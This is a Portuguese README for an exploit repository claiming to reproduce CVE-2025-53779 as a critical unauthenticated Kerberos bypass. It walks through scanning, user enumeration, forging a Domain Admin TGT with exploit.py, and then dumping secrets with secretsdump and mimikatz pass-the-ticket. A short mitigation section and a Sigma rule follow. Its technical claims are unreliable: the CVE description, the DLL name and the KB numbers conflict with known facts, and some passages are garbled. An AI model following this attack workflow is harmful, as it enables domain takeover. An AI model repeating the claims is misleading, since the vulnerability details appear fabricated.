
Reprodução de cve-2025-53779-kerberos_bypass_reproduction
Pontuação CVSS: 9.8 (Crítica)
Status: Exploração ativa no mundo real
Divulgação: Patch Tuesday de agosto de 2025 da Microsoft (Zero-Day)
A CVE-2025-53779 é uma vulnerabilidade crítica de bypass de autenticação na implementação do protocolo Kerberos do Microsoft Windows. Um atacante não autenticado pode explorar essa falha para contornar completamente a autenticação Kerberos, se passando por qualquer usuário do domínio — incluindo administradores de domínio — sem possuir credenciais válidas ou qualquer material criptográfico.
A Microsoft atribuiu a esta vulnerabilidade uma classificação CVSS 9.8 (Crítica) devido à sua baixa complexidade de ataque, nenhum privilégio necessário, nenhuma interação do usuário e ao potencial de comprometimento total de sistemas associados ao domínio.
A vulnerabilidade reside no serviço Kerberos Key Distribution Center (KDC) (kdsvc.dll) nos controladores de domínio do Windows. Especificamente, um erro de lógica de validação na rotina de verificação do Privilege Attribute Certificate (PAC) permite que um atacante crie uma mensagem AS-REQ ou TGS-REQ que contorna as verificações de autenticação padrão.
kdsvc.dllO KDC não valida corretamente o campo pac-signature-data na estrutura PAC quando sinalizadores específicos são definidos no corpo da mensagem Kerberos. Ao enviar uma AS-REQ especialmente criada com um tipo padata PA-PAC-REQUEST manipulado e uma entrada de dados de autorização forjada, o atacante engana o KDC para emitir um Ticket-Granting Ticket (TGT) para qualquer nome principal de usuário (UPN) sem exigir a chave de longo prazo correspondente.
O ataque contorna a pré-autenticação (o sinalizador REQUIRES_PRE_AUTH é efetivamente ignorado) e pula a verificação do PAC por completo, permitindo que o ticket gerado contenha associações de grupo arbitrárias (por exemplo, Domain Admins, Enterprise Admins).
Todas as versões suportadas do Windows Server são afetadas antes da atualização de segurança de agosto de 2025:
Nota: As versões cliente do Windows (Windows 10, Windows 11) não são afetadas, pois não executam o serviço KDC.
impacket instaladaexploit.py)pip install impacket pycryptodome
Ou usando o requirements.txt fornecido:
pip install -r requirements.txt
Use o Nmap para descobrir serviços Kerberos:
nmap -sU -p 88 --script krb5-enum-users <target-ip>
Ou use a varredura Kerberos integrada:
python exploit.py --scan <target-ip>
Se você não conhece os usuários do domínio, enumere-os via AS-REP roasting do Kerberos ou LDAP:
python exploit.py --enum <target-ip> <domain>
Gere um TGT forjado para um usuário-alvo:
python exploit.py --dc-ip <dc-ip> --domain <domain> --target-user <username>
Exemplo:
python exploit.py --dc-ip 192.168.1.10 --domain corp.local --target-user Administrator
O exploit gera um arquivo de ticket no formato Kirbi. Use as ferramentas do Impacket para verificar:
# Export the ticket
set KRB5CCNAME=ticket.kirbi
# Use the ticket to access a resource
python examples/secretsdump.py -k -no-pass <domain>/Administrator@<target>
Depois que um TGT válido é obtido, você pode:
secretsdump.py -k -no-pass domain/Administrator@<dc>mimikatz "kerberos::ptt ticket.kirbi"O exploit.py que acompanha implementa o seguinte fluxo de ataque:
PA-PAC-REQUEST forjado e dados de autorização manipuladoskdsvc.dllAttacker Domain Controller (KDC)
| |
| AS-REQ (forged PA-PAC-REQUEST) |
| - cname: Administrator |
| - sname: krbtgt/DOMAIN |
| - padata: PA-PAC-REQUEST + |
| forged auth-data |
|------------------------------------->|
| |
| [Vulnerable Path] |
| 1. KDC receives AS-REQ |
| 2. Checks PA-PAC-REQUEST flag |
| 3. **Bypasses pre-auth check** |
| 4. Skips PAC verification |
| 5. Generates TGT with arbitrary |
| groups via auth-data |
| |
| AS-REP (forged TGT) |
| - Encrypted with krbtgt key |
| - Contains forged PAC |
|<-------------------------------------|
| |
| TGS-REQ (use forged TGT) |
| - Request service ticket |
| - For any service (CIFS, LDAP, |
| HTTP, HOST) |
|------------------------------------->|
| |
| TGS-REP (service ticket) |
| - Legitimate service ticket |
| - Attacker can now access |
| any resource |
|<-------------------------------------|
Aplique as atualizações do Patch Tuesday de agosto de 2025 da Microsoft — Esta é a correção principal. Consulte a tabela de versões afetadas acima para o KB correspondente.
Monitore tentativas de exploração:
Segmentação de rede:
Ative logs adicionais:
NetworkProvider\Kerberos\Operational)Regra Sigma (AS-REQ sem pré-autenticação):
title: CVE-2025-53779 Kerberos Authentication Bypass
logsource:
product: windows
service: security
detection:
selection:
EventID: 4768
PreAuthenticationType: 0 # No pre-authentication required
condition: selection
falsepositives:
- Users with "Do not require Kerberos preauthentication" set
Este repositório é fornecido apenas para fins educacionais e de testes de segurança autorizados. A exploração não autorizada da CVE-2025-53779 contra sistemas que você não possui ou para os quais não possui permissão explícita por escrito para testar é ilegal. Os autores não são responsáveis por qualquer uso indevido destas informações.
Este projeto é licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes.
| Versão do Windows | Afetado | Atualização de Correção |
|---|
| Windows Server 2025 | ✅ Sim | KB5044289 |
| Windows Server 2022 | ✅ Sim | KB5044285 |
| Windows Server 2019 | ✅ Sim | KB5044277 |
| Windows Server 2016 | ✅ Sim | KB5044293 |
| Windows Server 2012 R2 | ✅ Sim | KB5044297 |
| Windows Server 2012 | ✅ Sim | KB5044291 |
| Windows Server 2008 R2 (ESU) | ✅ Sim | KB5044301 |
| Windows Server 2008 (ESU) | ✅ Sim | KB5044303 |